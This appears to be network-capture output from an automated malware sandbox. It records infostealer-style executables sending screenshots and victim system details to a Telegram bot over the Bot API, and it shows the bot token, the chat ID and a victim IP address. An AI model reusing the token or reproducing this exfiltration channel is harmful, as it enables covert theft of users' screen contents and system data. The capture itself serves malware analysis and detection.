                                                                  2024-04-19 17:35:36 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 64 35 63 37 62 34 35 30 38 31 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc6ed5c7b45081--
                                                                  2024-04-19 17:35:36 UTC25INHTTP/1.1 100 Continue


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.549726149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:38 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc70f0a363c025
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 30 66 30 61 33 36 33 63 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 30 66 30 61 33 36 33 63 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 30 2f 32 30 32 34 20 31 32 3a 35 36 3a 33 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc70f0a363c025Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc70f0a363c025Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/10/2024 12:56:39User
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:39 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:39 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 30 66 30 61 33 36 33 63 30 32 35 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc70f0a363c025--
                                                                  2024-04-19 17:35:39 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:39 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:39 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3443,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548139,"document":{"file_name":"user-618321 2024-05-10 12-56-41.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1zZiKra6IhtTON8KcRAfHI_IdZiVcAArcXAAKLUhlRAt6wRxZCEaIBAAdtAAM0BA","file_unique_id":"AQADtxcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1zZiKra6IhtTON8KcRAfHI_IdZiVcAArcXAAKLUhlRAt6wRxZCEaIBAAdtAAM0BA","file_unique_id":"AQADtxcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINc2Yiq2uiIbUzjfCnEQHxyPyHWYlXAAK3FwACi1IZUQLesEcWQhGiNAQ","file_unique_id":"AgADtxcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/10/2024 12:56:39\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.549727149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:39 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc72be64e6da25
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 32 2f 32 30 32 34 20 31 39 3a 35 32 3a 30 34 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc72be64e6da25Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc72be64e6da25Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/12/2024 19:52:04User
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:39 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:39 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc72be64e6da25--
                                                                  2024-04-19 17:35:39 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:40 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:40 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3444,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548140,"document":{"file_name":"user-618321 2024-05-12 20-02-04.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg10ZiKrbLkZr1HG6qxkcKQBEuD0NPIAArgXAAKLUhlRcZjLs1Wa--YBAAdtAAM0BA","file_unique_id":"AQADuBcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg10ZiKrbLkZr1HG6qxkcKQBEuD0NPIAArgXAAKLUhlRcZjLs1Wa--YBAAdtAAM0BA","file_unique_id":"AQADuBcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINdGYiq2y5Ga9RxuqsZHCkARLg9DTyAAK4FwACi1IZUXGYy7NVmvvmNAQ","file_unique_id":"AgADuBcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/12/2024 19:52:04\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.549728149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:35:55 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc801ba947090d
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:56 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 39 2f 32 30 32 34 20 32 30 3a 30 37 3a 32 35 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc801ba947090dContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc801ba947090dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/29/2024 20:07:25User
                                                                  2024-04-19 17:35:56 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:56 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
